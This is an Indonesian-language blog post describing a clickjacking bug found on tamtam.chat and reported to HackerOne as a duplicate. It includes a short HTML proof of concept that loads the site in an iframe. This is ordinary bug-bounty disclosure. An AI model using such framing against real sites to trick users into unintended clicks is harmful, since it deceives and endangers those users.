Thursday, 13 June 2019

Clickjacking TamTam.chat

Hi,apa kalian tahu https://tamtam.chat/? jika kalian tidak tahu saya akan menjelaskannya,tamtam chat adalah web social media ya seperti halnya Line,Whatsapp.Baru-baru ini saya mendapatkan bug pada website tersebut nama bugnya biasa disebut clickjacking ya saya mencoba dikarenakan bug ini menurut saya cukup simple kita hanya memasukan url kedalam iframe ya itu sih setau saya jika ada salah mohon komen ya 😄
tidak perlu berlama lagi,saya akan memberitahu cara saya mengeksekusinya
1.Saya membuka https://tamtam.chat/
2.Saya lalu memasukan  https://tamtam.chat/ kedalam script saya
 <!DOCTYPE HTML>
<html lang="en-US">
<head>
<meta charset="UTF-8">
<title>I Frame</title>
</head>
<body>
<h3>clickjacking vulnerability</h3>
<iframe src=" https://tamtam.chat/" height="550px" width="700px"></iframe>
</body>
</html>
3.lalu saya menyimpan filenya dengan ext html
4.saya membuka file tersebut dan hasilnya web tersebut muncul
saya telah mereportnya melalui website https://hackerone.com namun mungkin bukan rejekinya hehe,saya mendapat status duplicate :( tapi ya tak apa saya jadikan pembelajaran saja
dan mungkin sekian dulu artikel dari saya semoga bisa membantu kalian
Share:

0 comments:

Post a Comment